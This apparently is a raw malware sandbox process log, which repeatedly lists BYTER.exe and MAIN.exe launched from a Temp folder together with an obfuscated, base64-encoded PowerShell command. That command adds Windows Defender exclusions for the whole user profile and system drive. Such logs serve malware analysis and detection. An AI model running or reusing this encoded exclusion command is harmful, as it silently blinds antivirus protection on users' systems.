"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "171520143456164269197818441-19360905231759698437-130725631791066761-442870599"
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
